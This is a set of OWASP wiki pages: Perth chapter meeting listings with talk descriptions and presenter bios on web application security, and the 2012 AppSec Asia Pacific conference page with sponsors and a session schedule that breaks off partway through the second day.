Worried about having your site hacked? What about your Wordpress blog? David Taylor and Christian Frichot of OWASP Perth are back to talk about all things web security, and instead of spending a couple of hours trying to scare you with how to break stuff, we hope to educate you on how best to defend your web applications.

We’ll be covering a range of defensive methods, including addressing coding vulnerabilities directly, implementing an open source HIDS, or even implementing your own 2nd factor authentication scheme utilising the Google Authenticator.

Presented at Perth AISA's Techday 2011

=== How minor vulnerabilities can do ‘very bad things’ - The Sequel (May 2011) ===

Missed the 2010 AISA Techday session? Haven't made it out to an OWASP event lately? David and Christian are happy to be presenting their updated presentation, including live demos, on the impacts of web application security vulnerabilities at the upcoming Australia / New Zealand Testing Board (ANZTB) SIGIST meeting!

=== Cross-site scripting: You don’t always know who the actors are (May 2011) ===

So the time has come. Your company has finally approved the project to update your online web presence. A brand new, whiz-bang Content Management System is being deployed and your developers are frantically coding away to prepare a whole batch of fresh new content. Before you realise it, the delivery date is a week away and you have some security guy screaming at you about cross-site scripting issues!

Cross-site scripting? So what.

Does this experience sound familiar to you?

In this session Christian Frichot will spend some time dissecting this common web application vulnerability, and just how serious its impacts can be. Exploitation of cross-site scripting is no longer just within the realm of nerdy, hacker types, new (and old) tools out there allow this trivial vulnerability to be used for so much more, including keystroke logging, and even forcing your iPhone to dial a number via Skype. For those facing these issues there are plenty of resources which can help, and Christian will cover these as well.

=== How minor vulnerabilities can do ‘very bad things’ (December 2010) ===

The Perth branch of the Australian Information Security Association is pleased to announce details for the second annual Perth AISA Tech day to be held on the 3rd December. This year we are holding the event in the heart of Perth’s CBD thanks to proud AISA supporters L7 Solutions.

Appearing for their second consecutive year, regular AISA and OWASP members Christian and David are following on from last year’s topic. Last year you will remember that the demonstrated a number of classes of vulnerabilities in web applications (XSS, CSRF, SQL Injection etc.). This year they are going to show how relatively minor vulnerabilities can be exploited and leveraged to do ‘very bad things’ ™ to the client browser, the web server or both.

This session will include demonstrations of the BeEF browser exploitation framework and Metasploit.

=== Web Application (In)Security Brief - Injection (September 2010) ===

Having recently run training sessions on web application security for SyScan'10 and Blackhat, we're lucky enough to have Wade Alcorn from NGS to give a brief presentation on "Exploiting and discovering injection" for September's Perth OWASP Meeting. Come on up to Level 46 of the Bankwest Tower to join us discuss web application security with Wade and others. Please RSVP to ensure appropriate seating arrangements and we're hoping to then shift off to the Generous Squire for a quick beverage afterwards!

==== About the presenter ====

Wade Alcorn has experience in numerous aspects of offensive information security assessments. This ranges from bluetooth, reverse engineering and web application assessments to managing large teams of security professionals. Prior to joining NGS, Wade had been responsible for cutting-edge PKI and VPN development using technologies including C/C++ and Java. He has presented at conferences including BlackHat and AusCERT.

=== Security Event and Incident Management" Panel Session (Perth AISA August 2010) ===

==== [http://www.aisa.org.au/index.php?page=301 AISA Details] ====

Log management is a necessary task in Security Management, but is often neglected. There are various pressures being placed on businesses, such as audit and compliance, industry standards (eg PCI, APRA), internal security maturity which have allowed organisations to understand the benefits to be gained from undertaking a SEIM project.

There are many options for organisations looking to develop log management and security incident response processes, which range from open source syslog solutions, through to vendor supplied SEIM products and cloud based monitoring solutions.

A panel selected from a variety of industries including representation from security consulting, corporate and vendor will discuss the considerations, options and benefits of employing SEIM technology and processes.

We were fortunate to have Joshua Qwek, one of Perth's OWASP chapter lead, participate in this panel.

=== How mature is your software security process? (Perth AISA May 2010) ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2012-03-14T07:17:48Z

Xntrik: Updated with Mar2012 talk

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

=== Secure Coding and OOAD ===

Building on the OWASP secure coding priniciples, this session will introduce Robert C Martin's 5 OO principles in order to show how well designed code can help with the implementation and enforcement of secure coding principles, as well as alleviating maintenance headaches.

==== About Chris Arnold ====

Chris doesn't like writing bios in the 3rd person, but he's always held an interest in information systems security, and believes that it is becoming increasingly important for developers to accept responsibility for their product's security. He also doesn't like making unjustified statements so if you're interested, feel free to ask him why. Chris has 13 years' experience as a software engineer, and currently holds a position as an architect for Swiss power and automation provider ABB.

'''Date: Wednesday 21st March 2012'''
'''Time: 17:15 sign in, 17:30 start'''
'''Location: Level 46, Bankwest Tower, 108 St Georges Tce, Perth, 6000'''
'''RSVP: http://owaspperthmar2012.eventbrite.com/'''

== Previous OWASP Meetings ==

=== Defending Web Applications (December 2011) ===

Worried about having your site hacked? What about your Wordpress blog? David Taylor and Christian Frichot of OWASP Perth are back to talk about all things web security, and instead of spending a couple of hours trying to scare you with how to break stuff, we hope to educate you on how best to defend your web applications.

We’ll be covering a range of defensive methods, including addressing coding vulnerabilities directly, implementing an open source HIDS, or even implementing your own 2nd factor authentication scheme utilising the Google Authenticator.

Presented at Perth AISA's Techday 2011

=== How minor vulnerabilities can do ‘very bad things’ - The Sequel (May 2011) ===

Missed the 2010 AISA Techday session? Haven't made it out to an OWASP event lately? David and Christian are happy to be presenting their updated presentation, including live demos, on the impacts of web application security vulnerabilities at the upcoming Australia / New Zealand Testing Board (ANZTB) SIGIST meeting!

=== Cross-site scripting: You don’t always know who the actors are (May 2011) ===

So the time has come. Your company has finally approved the project to update your online web presence. A brand new, whiz-bang Content Management System is being deployed and your developers are frantically coding away to prepare a whole batch of fresh new content. Before you realise it, the delivery date is a week away and you have some security guy screaming at you about cross-site scripting issues!

Cross-site scripting? So what.

Does this experience sound familiar to you?

In this session Christian Frichot will spend some time dissecting this common web application vulnerability, and just how serious its impacts can be. Exploitation of cross-site scripting is no longer just within the realm of nerdy, hacker types, new (and old) tools out there allow this trivial vulnerability to be used for so much more, including keystroke logging, and even forcing your iPhone to dial a number via Skype. For those facing these issues there are plenty of resources which can help, and Christian will cover these as well.

=== How minor vulnerabilities can do ‘very bad things’ (December 2010) ===

The Perth branch of the Australian Information Security Association is pleased to announce details for the second annual Perth AISA Tech day to be held on the 3rd December. This year we are holding the event in the heart of Perth’s CBD thanks to proud AISA supporters L7 Solutions.

Appearing for their second consecutive year, regular AISA and OWASP members Christian and David are following on from last year’s topic. Last year you will remember that the demonstrated a number of classes of vulnerabilities in web applications (XSS, CSRF, SQL Injection etc.). This year they are going to show how relatively minor vulnerabilities can be exploited and leveraged to do ‘very bad things’ ™ to the client browser, the web server or both.

This session will include demonstrations of the BeEF browser exploitation framework and Metasploit.

=== Web Application (In)Security Brief - Injection (September 2010) ===

Having recently run training sessions on web application security for SyScan'10 and Blackhat, we're lucky enough to have Wade Alcorn from NGS to give a brief presentation on "Exploiting and discovering injection" for September's Perth OWASP Meeting. Come on up to Level 46 of the Bankwest Tower to join us discuss web application security with Wade and others. Please RSVP to ensure appropriate seating arrangements and we're hoping to then shift off to the Generous Squire for a quick beverage afterwards!

==== About the presenter ====

Wade Alcorn has experience in numerous aspects of offensive information security assessments. This ranges from bluetooth, reverse engineering and web application assessments to managing large teams of security professionals. Prior to joining NGS, Wade had been responsible for cutting-edge PKI and VPN development using technologies including C/C++ and Java. He has presented at conferences including BlackHat and AusCERT.

=== Security Event and Incident Management" Panel Session (Perth AISA August 2010) ===

==== [http://www.aisa.org.au/index.php?page=301 AISA Details] ====

Log management is a necessary task in Security Management, but is often neglected. There are various pressures being placed on businesses, such as audit and compliance, industry standards (eg PCI, APRA), internal security maturity which have allowed organisations to understand the benefits to be gained from undertaking a SEIM project.

There are many options for organisations looking to develop log management and security incident response processes, which range from open source syslog solutions, through to vendor supplied SEIM products and cloud based monitoring solutions.

A panel selected from a variety of industries including representation from security consulting, corporate and vendor will discuss the considerations, options and benefits of employing SEIM technology and processes.

We were fortunate to have Joshua Qwek, one of Perth's OWASP chapter lead, participate in this panel.

=== How mature is your software security process? (Perth AISA May 2010) ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

[[Category:OWASP Chapter]]
[[Category:Australia]]

AppSecAsiaPac2012

2012-03-03T07:37:47Z

Xntrik: changed BeFF to BeEF

__NOTOC__
{| border="0" align="center" style="width: 100%;"
|-
| style="width: 75%; background: none repeat scroll 0% 0% rgb(255, 255, 255);" |
[[File:Owasp appsecAsia2012ConfBanner.jpg]]
| style="width: 25%; background: none repeat scroll 0% 0% rgb(255, 255, 255);" |
[[File:RegisterForAppsec.png|link=http://www.regonline.com/appsecapac2012]]
|}
=Welcome=

{{Social Media Links}}



{| border="0" cellpadding="15" align="center" class="FCK__ShowTableBorders" style="width: 100%;"
|-
| style="width: 35%; background: none repeat scroll 0% 0% rgb(255, 255, 255); color: black;" |
<center>[[File:Owaspconf2012_small320w.jpg]]</center>

 
 
'''Welcome to the OWASP 2012 Appsec Asia Pacific Conference.'''

The event is being held in Sydney, Australia from the 11th to the 14th of April 2012 at the Four Points Sheraton Darling Harbour.

The conference consists of 2 days of world class training by OWASP instructor's followed by 2 days of quality presentations and keynotes from industry leaders, OWASP projects and industry consultants. In previous years the OWASP Asia Pacific conference has been rated as one of the "must attend" events of the year, with the conference always filling up quickly.
 

'''Who should attend this conference:'''

* Application Developers, Testers, Quality Assurance Team Members
* Chief Information Officers, Security Officers, Technology Officers
* Security Managers and Staff
* Executives, Managers and staff responsible for IT Security Governance
* IT Professionals interested in Improving Information Security
 

'''Conference Highlights:'''

* Alastair MacGibbon: Keynote Presentation (more information available on "Speakers" Tab)
* Jacob West (Fortify - HP): Keynote Presentation (more information available on "Speakers" Tab)
* Industry Leading training - Exploiting Web Applications with Samurai-WTF
* Industry Panel from Finance and Insurance Sectors
* Networking Opportunities to meet peers and other developers
* Gain access to resources within OWASP projects as well as leading vendors
 
[[File:RegisterForAppsec.png|link=http://www.regonline.com/appsecapac2012]]

| style="width: 20%; background: none repeat scroll 0% 0% rgb(255, 255, 255);" |
<center>'''Thank you to all of our supporters!'''</center>
 
<h2><center>Diamond & Platinum Sponsors</center></h2>

<center>[[File:Fortify HP logo.png|link=http://www.fortify.com]]</center>

<h2><center>Gold & Silver Sponsors</center></h2>

<center>[[File:AppsecureTransLogo.png|link=http://www.appsecure.com/]]</center> 

<center>[[File:CS-LogoWeb.png|link=http://www.contentsecurity.com.au/]]</center> 

<center>[[File:Imperva 312x54.jpg|link=http://www.imperva.com/]]</center> 

<center>[[File:Trustwave small.png|link=http://www.trustwave.com/]]</center> 

<h2><center> Associations & Supporters</center></h2>
We are proudly supported by the following Industry Associations and Media outlets.

<center>[[File:Auscert-Header-logo.gif|link=http://www.auscert.org.au/]]</center>

<center>[[File:AisaLogo.png|link=http://www.aisa.org.au/]]</center>

|}

=Registration Costs=

{{:AppSecAsiaPac2012/Register}}

=Training=

{{:AppSecAsiaPac2012/Training}}

= Conference Schedule=

NOTE: Conference is scheduled to change as required by the conference committee, check back for updates prior to the conference.


{| border="0" align="center" class="FCK__ShowTableBorders" style="width: 75%;"
|-
| align="center" colspan="4" style="background: none repeat scroll 0% 0% rgb(64, 88, 160); color: white;" | '''Conference Day 1 - Friday - April 13th''' 
 
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" | ''(Time Allocated)''
| style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" | '''Track 1 - Detect''' (Grand Ballroom 1 & 2)
| style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 165, 122);" | '''Track 2 - Protect''' (Grand Ballroom 3)
| style="width: 30%; background: none repeat scroll 0% 0% rgb(204, 255, 122);" | '''Track 3 - Leadership & OWASP''' (Wharf & Bridge Rooms Level 1)
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''7:30 - 8:30 AM''
 
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(194, 194, 194);" | '''Conference Registration Open - Coffee & Tea Available '''
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''8:30-8:40 AM''
 
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" | '''Conference Opening - Appsec Asia 2012'''
Speakers: Conference Committee Chair - Mr Justin Derry
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''8:40-9:30 AM''
 
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" | '''KeyNote: Presentation'''
Speaker: Alastair MacGibbon
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''9:30-9:40 AM''
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(246, 246, 246);" | Short Break - Conference Movement
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''9:40-10:30 AM''
 
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" | '''KeyNote: Presentation'''
Speaker: Rafal Los
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''10:30-11:00 AM''
 
| align="center" colspan="3" style="width: 90%; background: none repeat scroll 0% 0% rgb(194, 194, 194);" | '''Break - Morning Tea - Provided for attendees in main EXPO & Conference Hall - Ground Level'''
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''11:00-11:50 AM''
 
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" |  '''Presentation: You can't filter the stupid!'''
 Speakers: Charles Henderson & David Byrne
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 165, 122);" |  '''Presentation: Advanced Mobile Application Code Review Techniques'''
 Speaker: Prashant Vema
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(204, 255, 122);" |  '''Presentation: Effective Software Development in a PCI-DSS Environment'''
 Speaker: Bruce Ashton
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''11:50-12:00 PM''
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(246, 246, 246);" | Short Break - Conference Movement
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''12:00-12:50 PM''
 
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" |  '''Presentation: Testing from the Cloud. Is the Sky Falling?'''
 Speaker: Matt Tesauro
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 165, 122);" |  '''Presentation: Rethinking Web Application Architecture for Cloud'''
 Speaker: Arshad Noor
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(204, 255, 122);" |  '''Presentation: OWASP Project - Secure Coding Practices Quick Reference Guide'''
 Speaker: Justin Clarke
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''12:50-1:30 PM''
 
| align="center" colspan="3" style="width: 90%; background: none repeat scroll 0% 0% rgb(194, 194, 194);" | '''Break - Lunch - Provided for attendees in main Expo & Conference Hall - Ground Level'''
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''1:30-2:20 PM''
 
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" |  '''Presentation: Security Testing on Web Apps - How to protect yourself'''
 Speaker: Magno Rodrigues
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 165, 122);" |  '''Presentation: Mobile Security on iOS and Andriod'''
 Speaker: Mike Park (Trustwave)
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(204, 255, 122);" |  '''Presentation: TBA'''
 Speaker: TBA
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''2:20-2:30 PM''
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(246, 246, 246);" | Short Break - Conference Movement
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''2:30-3:20 PM''
 
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" |  '''Presentation: Pen Testing Mobile Applications'''
 Speaker: Frank Fan
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 165, 122);" |  '''Presentation: Application Security Logging & Monitoring, The Next Frontier'''
 Speaker: Peter Freiberg
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(204, 255, 122);" |  '''Presentation: OWASP Project - OpenSAMM (Governance)'''
 Speaker: Pravir Chandra
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''3:30-4:00 PM''
 
| align="center" colspan="3" style="width: 90%; background: none repeat scroll 0% 0% rgb(194, 194, 194);" | '''Break - Afternoon Tea - Provided for attendees in EXPO & Conference Hall - Ground Level'''
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''4:00-4:50 PM''
 
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" |  '''Presentation: Harder, Better, Faster, Stronger (SQLi)'''
 Speakers: Luke Jahnke & Louis Nyffenegger
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 165, 122);" |  '''Presentation: Securing the SSL Channel against Man-in-the-middle Attacks'''
 Speaker: Tobias Gondrom
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(204, 255, 122);" |  '''Presentation: The risks that Pen Tests don't find'''
 Speaker: Gary Gaskell
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''4:50-5:00 PM''
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(246, 246, 246);" | Short Break - Conference Movement
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''5:00-5:30 PM''
 
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" | '''Panel Discussion - Application Security Trends in 2012'''
Panelists: TBA
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''5:30-6:30 PM''
 
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(194, 194, 194);" | '''OWASP - Afternoon Networking Event - TBA'''
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''6:30 - 10:00 PM''
 
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(194, 194, 194);" | '''OWASP - Evening Networking Event - TBA'''
|}

{| border="0" align="center" class="FCK__ShowTableBorders" style="width: 75%;"
|-
| align="center" colspan="4" style="background: none repeat scroll 0% 0% rgb(64, 88, 160); color: white;" | '''Conference Day 2 - Saturday- April 14th''' 
 
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" | ''(Time Allocated)''
| style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" | '''Track 1 - Detect''' (Grand Ballroom 1 & 2)
| style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 165, 122);" | '''Track 2 - Protect''' (Grand Ballroom 3)
| style="width: 30%; background: none repeat scroll 0% 0% rgb(204, 255, 122);" | '''Track 3 - Leadership & OWASP''' (Wharf & Bridge Rooms Level 1)
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''7:30 - 8:30 AM''
 
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(194, 194, 194);" | '''Conference Registration Open - Coffee & Tea Available '''
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''8:30-8:40 AM''
 
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" | '''Conference Day 2 Update- Appsec Asia 2012'''
Speakers: Conference Committee Chair - Mr Justin Derry
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''8:40-9:30 AM''
 
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" | '''KeyNote: Presentation'''
Speaker: Jeremiah Grossman
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''9:30-9:40 AM''
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(246, 246, 246);" | Short Break - Conference Movement
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''9:40-10:30 AM''
 
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" | '''KeyNote: Presentation'''
Speaker: Dr Jason Smith
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''10:30-11:00 AM''
 
| align="center" colspan="3" style="width: 90%; background: none repeat scroll 0% 0% rgb(194, 194, 194);" | '''Break - Morning Tea - Provided for attendees in main EXPO & Conference Hall - Ground Level'''
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''11:00-11:50 AM''
 
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" |  '''Presentation: Attacking Captcha for Fun and Profit'''
 Speaker: Gursev Singh Kalra
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 165, 122);" |  '''Presentation: Password Less Authentication & Authorization & Payments'''
 Speaker: Srikar Sagi
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(204, 255, 122);" |  '''Presentation: OWASP Project - ZED Attack Proxy'''
 Speaker: Simon Bennetts
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''11:50-12:00 PM''
| align="center" colspan="3" style="width: 80%; background: none repeat scroll 0% 0% rgb(246, 246, 246);" | Short Break - Conference Movement
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''12:00-12:50 PM''
 
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" |  '''Presentation: HTTP Fingerprinting - Next Generation'''
 Speaker: Eldar Marcussen
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 165, 122);" |  '''Presentation: Web Crypto for the Developer who has better things to do.'''
 Speaker: Adrian Hayes
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(204, 255, 122);" |  '''Presentation: Static Code Analysis & Governance'''
 Speaker: Jonathan Carter
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''12:50-1:30 PM''
 
| align="center" colspan="3" style="width: 90%; background: none repeat scroll 0% 0% rgb(194, 194, 194);" | '''Break - Lunch - Provided for attendees in main Expo & Conference Hall - Ground Level'''
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''1:30-2:20 PM''
 
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 133, 122);" |  '''Presentation: Shake Hooves with BeEF'''
 Speaker: Christian Frichot
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(188, 165, 122);" |  '''Presentation: Software Security Goes Mobile'''
 Speakers: Jacob West & Matias Madou
| align="left" style="width: 30%; background: none repeat scroll 0% 0% rgb(204, 255, 122);" |  '''Presentation: Data Breaches - When Application Security Goes Wrong'''
 Speaker: Mark Goudie
|-
| style="width: 10%; background: none repeat scroll 0% 0% rgb(123, 138, 189);" |  ''2:20-2:30 PM''
